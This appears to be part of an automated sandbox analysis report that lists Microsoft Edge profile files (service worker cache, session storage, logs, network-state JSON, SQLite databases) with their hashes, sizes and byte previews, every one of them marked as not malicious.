SHA-256:	C08791AC7ADD53CF676386EBC041E3690F3B8A28038871E1EAD52D120E5BC556
SHA-512:	CFE5204C2B8CBFFDBB058023D9FD3488769BB23AF58A5FE99AAB6E8FD36E4219911E2E330A48053CBDD4F61B501881EAD619F7610CB8B69AB39B8993919AD356
Malicious:	false
Preview:	0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this\|\|new Function("return this")()}catch(e){if("object"==typeof window

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	188921
Entropy (8bit):	6.3852001311999125
Encrypted:	false
SSDEEP:	3072:RRKGDHL9NwvCAMk94L/9qbt9Pq1deT86SmDYM0y:FNwPMkuL/IRA1UH
MD5:	9082804B5A3504C53A8D71758A364448
SHA1:	30FB31A06DF840B914C5DDF7139EB45DB558C6B9
SHA-256:	00F37F3643D0DD11AB0097196D80E698C61501558181893E37F571D9CBC8E7A0
SHA-512:	7B2A735DBD4DC65AEF8E114350A797DBC00A422633071B491206D889EEBE3D3CE3815BC1AE71F4E482C532562A78CE823162C2046BD8610C68CDC0392E8F50E2
Malicious:	false
Preview:	0\r..m..........rSG.....0....z3.................;.....x..........,T.8..`,.....L`.....,T...`......L`......Rcz.......exports...Rc........module....Rc&.......define....Rb........amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...\|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q.....o.{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da....^Y...,T.`.`z.....L`..........a............a.........Dr8..............

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	24
Entropy (8bit):	2.1431558784658327
Encrypted:	false
SSDEEP:	3:m+l:m
MD5:	54CB446F628B2EA4A5BCE5769910512E
SHA1:	C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
SHA-256:	FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
SHA-512:	8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
Malicious:	false
Preview:	0\r..m..................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:BmfFQR0Xl/ly/l9/lxEga/lGku+:QFmOHGZ+
MD5:	845DBA45A7EADD5FBB6ADBA7085AAA13
SHA1:	AE6D170E6D206474AF424C4C970EF0FB322921C2
SHA-256:	C92FFC5C19BFB632DAB6EDE6FEE7DC461A3BAA1D2D200C390B2FE11CB1838975
SHA-512:	C25AD4C8F3AB671FE5C744EBF1843F590D8E82A4EA372EA41A9326364C6866B96563A6896805E630FEA8494B05932D7CF1B74279A9CA974B4EFDF0BF38A53707
Malicious:	false
Preview:	@....C..oy retne.........................X....,...................F'./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:BmfFQR0Xl/ly/l9/lxEga/lGku+:QFmOHGZ+
MD5:	845DBA45A7EADD5FBB6ADBA7085AAA13
SHA1:	AE6D170E6D206474AF424C4C970EF0FB322921C2
SHA-256:	C92FFC5C19BFB632DAB6EDE6FEE7DC461A3BAA1D2D200C390B2FE11CB1838975
SHA-512:	C25AD4C8F3AB671FE5C744EBF1843F590D8E82A4EA372EA41A9326364C6866B96563A6896805E630FEA8494B05932D7CF1B74279A9CA974B4EFDF0BF38A53707
Malicious:	false
Preview:	@....C..oy retne.........................X....,...................F'./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF3d6e9.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	72
Entropy (8bit):	3.5931902015385067
Encrypted:	false
SSDEEP:	3:BmfFQR0Xl/ly/l9/lxEga/lGku+:QFmOHGZ+
MD5:	845DBA45A7EADD5FBB6ADBA7085AAA13
SHA1:	AE6D170E6D206474AF424C4C970EF0FB322921C2
SHA-256:	C92FFC5C19BFB632DAB6EDE6FEE7DC461A3BAA1D2D200C390B2FE11CB1838975
SHA-512:	C25AD4C8F3AB671FE5C744EBF1843F590D8E82A4EA372EA41A9326364C6866B96563A6896805E630FEA8494B05932D7CF1B74279A9CA974B4EFDF0BF38A53707
Malicious:	false
Preview:	@....C..oy retne.........................X....,...................F'./.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	7091
Entropy (8bit):	3.373370140657616
Encrypted:	false
SSDEEP:	192:UsEGR1ilT0VMgLVi9Xp+ZkiRLl9iSrTThx:U+R1iZb9Xp+KMLl9iSrXX
MD5:	EC73A04504C2E5B6E203BEB84ED02381
SHA1:	D392337AA9D427DBE3A67EFEDF33EE02314415E9
SHA-256:	7820FE61AE535A768380705F25521F4752E4AE07C0C8BE43889FD41793277586
SHA-512:	1B963D4F662222031D9617BA4804CC1D02A45249C523983901C4F8A2F64842EBFC8C44D69EF26613E55844D7B02C1A07D7C13E834119777D5C11BB71C5E0CEBA
Malicious:	false
Preview:	*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f.................,.b................next-map-id.1.Cnamespace-d1962b5a_9ce2_447b_bfb5_f80a1f24c97c-https://ntp.msn.com/.0L.K.n................map-0-shd_sweeper.4{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.c.p.r.g.-.x.d.r.2.2.3.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.c.,.p.r.g.-.h.p.-.d.i.s.p.o.l.l.,.c.p.r.g.-.c.-.p.o.l.i.s.h.-.s.t.y.l.e.s.,.p.r.g.-.1.s.w.-.s.a.g.e.i.m.c.o.u.n.t.1.,.p.r.g.-.1.s.w.-.s.a.l.2.c.l.r.w.t.2.,.p.r.g.-.1.s.w.-.a.b.r.t.p.g.-.r.,.p.r.g.-.1.s.w.-.r.e.v._.a.b.r.t.p.g.,.p.r.g.-.1.s.w.-.t.m.u.i.d.s.y.n.c.r.f.w.o.e.r.r.,.p.r.g.-.1.s.w.-.r.e.f.r.e.s.h.p.,.p.r.g.-.1.s.w.-.t.m.u.i.d.1.s.s.y.n.c.,.1.s.-.n.t.f.1.-.f.g.d.c.,.1.s.-.n.t.f.1.-.w.x.c.f.s.t.t.e.,.p.r.g.-.c.g.-.c.r.o.s.a.l.o.c.1.,.p.r.g.-.f.i.n.-.b.a.n.

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.119698411884959
Encrypted:	false
SSDEEP:	6:7PQ+KN9+q2PqLTwi23oH+TcwtrQMxIFUt8OPQ+A7HZZmw+OPQ+Ez9VkwOqLTwi2n:7o9Ov8wZYebCFUt8Oo37Z/+OozzD5Twh
MD5:	C3FE1B122D165CB8D0EE9E90D5A04E16
SHA1:	1B749281C1773EE32E19DAD83F5EE6D627A5C977
SHA-256:	3F59FD5AF7E0B3B719F8016DF27D8A5AB6BE757DCFBB63228EA78985D3D941FE
SHA-512:	8E819C03137B43D2CD8A2071DA5DFB6A578FAE7EF7B73CEDC47F9CC32A1288D679C041FDC625C13156FA2E43FA066BDFB4C4E71C146BCC7305CF5E30A6BBDDA2
Malicious:	false
Preview:	2024/12/18-15:09:23.109 aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/18-15:09:23.112 aa8 Recovering log #3.2024/12/18-15:09:23.116 aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	317
Entropy (8bit):	5.119698411884959
Encrypted:	false
SSDEEP:	6:7PQ+KN9+q2PqLTwi23oH+TcwtrQMxIFUt8OPQ+A7HZZmw+OPQ+Ez9VkwOqLTwi2n:7o9Ov8wZYebCFUt8Oo37Z/+OozzD5Twh
MD5:	C3FE1B122D165CB8D0EE9E90D5A04E16
SHA1:	1B749281C1773EE32E19DAD83F5EE6D627A5C977
SHA-256:	3F59FD5AF7E0B3B719F8016DF27D8A5AB6BE757DCFBB63228EA78985D3D941FE
SHA-512:	8E819C03137B43D2CD8A2071DA5DFB6A578FAE7EF7B73CEDC47F9CC32A1288D679C041FDC625C13156FA2E43FA066BDFB4C4E71C146BCC7305CF5E30A6BBDDA2
Malicious:	false
Preview:	2024/12/18-15:09:23.109 aa8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2024/12/18-15:09:23.112 aa8 Recovering log #3.2024/12/18-15:09:23.116 aa8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13379026164868204

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	1443
Entropy (8bit):	3.810798738323809
Encrypted:	false
SSDEEP:	24:3am0LFk/jVuQFMdpsAF4unx6tLp3X2amEtG1ChqFR2Ln18mpUsCQKkOAM4x:3amVuQSdzFsLp2FEkChj18psTHOp
MD5:	6B8617FB5B2A2C4A47C086F10F3F5CE2
SHA1:	F59E33461132DCF663DFF6FD324192D26916204C
SHA-256:	9056745EA31A11BF6AE6D7BB716B4D96A86D1AEE5ABCCA036566050C42EF794C
SHA-512:	2060570B7A28B061E218A3D2BB16BFC4C7802D0D951CFE20FC6E4E9444F42C57B3D8CDC76DD7E044B7D07D5AEBE911F3B9D9D2F7719938B3D20B5366E55660C9
Malicious:	false
Preview:	SNSS........_.V............_.V......"._.V............_.V........_.V........_.V........_.V....!..._.V................................_.V._.V1..,...._.V$...d1962b5a_9ce2_447b_bfb5_f80a1f24c97c...._.V........_.V..............._.V...._.V........................_.V....................5..0...._.V&...{3A9A5720-BFF5-4C6E-B4C6-310A980401CC}......_.V........_.V..........................._.V............_.V........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......}...)..~...).................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.44194574462308833
Encrypted:	false
SSDEEP:	12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
MD5:	B35F740AA7FFEA282E525838EABFE0A6
SHA1:	A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
SHA-256:	5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
SHA-512:	05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.188499994496523
Encrypted:	false
SSDEEP:	6:7PQ+fnW539+q2PqLTwi23oH+Tcwt7Uh2ghZIFUt8OPQ+fnW53JZmw+OPQ+fnWeVj:7oDp9+v8wZYebIhHh2FUt8OoDpJ/+OoA
MD5:	69F0FF6E6BC43006FE9153EE5B5E45A5
SHA1:	91F4A1507C27FD3D5B8F3063256896FCAF821902
SHA-256:	4F673CA57EB5A3C086F8F49104E11A9676D543C50A6DC71FE06217C36C0A0D26
SHA-512:	164F284B3EE8BCE1FEDD428BC6C564087ADC331A9D95AB9259ED9B35CDB09AB6F9EB25A43EDE5CD53821C36EF301D7E7839D5CF550F348CB9B4343859C5E8E3B
Malicious:	false
Preview:	2024/12/18-15:09:22.636 f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-15:09:22.636 f7c Recovering log #3.2024/12/18-15:09:22.637 f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	345
Entropy (8bit):	5.188499994496523
Encrypted:	false
SSDEEP:	6:7PQ+fnW539+q2PqLTwi23oH+Tcwt7Uh2ghZIFUt8OPQ+fnW53JZmw+OPQ+fnWeVj:7oDp9+v8wZYebIhHh2FUt8OoDpJ/+OoA
MD5:	69F0FF6E6BC43006FE9153EE5B5E45A5
SHA1:	91F4A1507C27FD3D5B8F3063256896FCAF821902
SHA-256:	4F673CA57EB5A3C086F8F49104E11A9676D543C50A6DC71FE06217C36C0A0D26
SHA-512:	164F284B3EE8BCE1FEDD428BC6C564087ADC331A9D95AB9259ED9B35CDB09AB6F9EB25A43EDE5CD53821C36EF301D7E7839D5CF550F348CB9B4343859C5E8E3B
Malicious:	false
Preview:	2024/12/18-15:09:22.636 f7c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/MANIFEST-000001.2024/12/18-15:09:22.636 f7c Recovering log #3.2024/12/18-15:09:22.637 f7c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\DawnCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\GPUCache\data_1

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	data
Category:	dropped
Size (bytes):	270336
Entropy (8bit):	0.0012471779557650352
Encrypted:	false
SSDEEP:	3:MsEllllkEthXllkl2zE:/M/xT02z
MD5:	F50F89A0A91564D0B8A211F8921AA7DE
SHA1:	112403A17DD69D5B9018B8CEDE023CB3B54EAB7D
SHA-256:	B1E963D702392FB7224786E7D56D43973E9B9EFD1B89C17814D7C558FFC0CDEC
SHA-512:	BF8CDA48CF1EC4E73F0DD1D4FA5562AF1836120214EDB74957430CD3E4A2783E801FA3F4ED2AFB375257CAEED4ABE958265237D6E0AACF35A9EDE7A2E8898D58
Malicious:	false
Preview:	........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.2586909609046
Encrypted:	false
SSDEEP:	12:7ocHOv8wZYebvqBQFUt8OoF/1/+Oot5TwZYebvqBvJ:7ocHM8wZYebvZg8OoPo/TwZYebvk
MD5:	6266026329D44887DDA3578AA5C3FEF7
SHA1:	FC18B4E5D5D8BAC1113807EF7632FCF65BB7D844
SHA-256:	9AF999B5196121DB055D8919A07CCB359E7A6B3C2FBAC9E271E7E4C460B18A44
SHA-512:	C70C0203F4FEE58C75C2AA7298B11B0FC58CB3C0C1FF639B3B0999DC4C870B26763020D151B20D02220C702E790E92409BFB96A21506772EE7F5EE8CE9F464D5
Malicious:	false
Preview:	2024/12/18-15:09:23.107 1954 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:09:23.117 1954 Recovering log #3.2024/12/18-15:09:23.122 1954 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	430
Entropy (8bit):	5.2586909609046
Encrypted:	false
SSDEEP:	12:7ocHOv8wZYebvqBQFUt8OoF/1/+Oot5TwZYebvqBvJ:7ocHM8wZYebvZg8OoPo/TwZYebvk
MD5:	6266026329D44887DDA3578AA5C3FEF7
SHA1:	FC18B4E5D5D8BAC1113807EF7632FCF65BB7D844
SHA-256:	9AF999B5196121DB055D8919A07CCB359E7A6B3C2FBAC9E271E7E4C460B18A44
SHA-512:	C70C0203F4FEE58C75C2AA7298B11B0FC58CB3C0C1FF639B3B0999DC4C870B26763020D151B20D02220C702E790E92409BFB96A21506772EE7F5EE8CE9F464D5
Malicious:	false
Preview:	2024/12/18-15:09:23.107 1954 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/MANIFEST-000001.2024/12/18-15:09:23.117 1954 Recovering log #3.2024/12/18-15:09:23.122 1954 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\100422e1-0e12-45af-9492-1c34da12f68b.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
MD5:	807419CA9A4734FEAF8D8563A003B048
SHA1:	A723C7D60A65886FFA068711F1E900CCC85922A6
SHA-256:	AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
SHA-512:	F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\60a2029d-9664-4b3c-8210-c7c97eeaed90.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\7f874923-a7b4-4878-a731-cd63c946d4d7.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	111
Entropy (8bit):	4.718418993774295
Encrypted:	false
SSDEEP:	3:YLb9N+eAXRfHDH2LS7PMVKJq0nMb1KKqk1Yn:YHpoeS7PMVKJTnMRKXk1Yn
MD5:	807419CA9A4734FEAF8D8563A003B048
SHA1:	A723C7D60A65886FFA068711F1E900CCC85922A6
SHA-256:	AA10BF07B0D265BED28F2A475F3564D8DDB5E4D4FFEE0AB6F3A0CC564907B631
SHA-512:	F10D496AE75DB5BA412BD9F17BF0C7DA7632DB92A3FABF7F24071E40F5759C6A875AD8F3A72BAD149DA58B3DA3B816077DF125D0D9F3544ADBA68C66353D206C
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[],"version":5},"network_qualities":{"CAESABiAgICA+P////8B":"3G"}}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\SCT Auditing Pending Reports~RF36bab.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Storage\ext\ihmafllikibpmigkcoadcmckbfhibefp\def\Network\Trust Tokens

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 9, cookie 0x7, schema 4, UTF-8, version-valid-for 4
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	0.3886039372934488
Encrypted:	false
SSDEEP:	24:TLqEeWOT/kIAoDJ84l5lDlnDMlRlyKDtM6UwccWfp15fBIe:T2EeWOT/nDtX5nDOvyKDhU1cSB
MD5:	DEA619BA33775B1BAEEC7B32110CB3BD
SHA1:	949B8246021D004B2E772742D34B2FC8863E1AAA
SHA-256:	3669D76771207A121594B439280A67E3A6B1CBAE8CE67A42C8312D33BA18854B
SHA-512:	7B9741E0339B30D73FACD4670A9898147BE62B8F063A59736AFDDC83D3F03B61349828F2AE88F682D42C177AE37E18349FD41654AEBA50DDF10CD6DC70FA5879
Malicious:	false
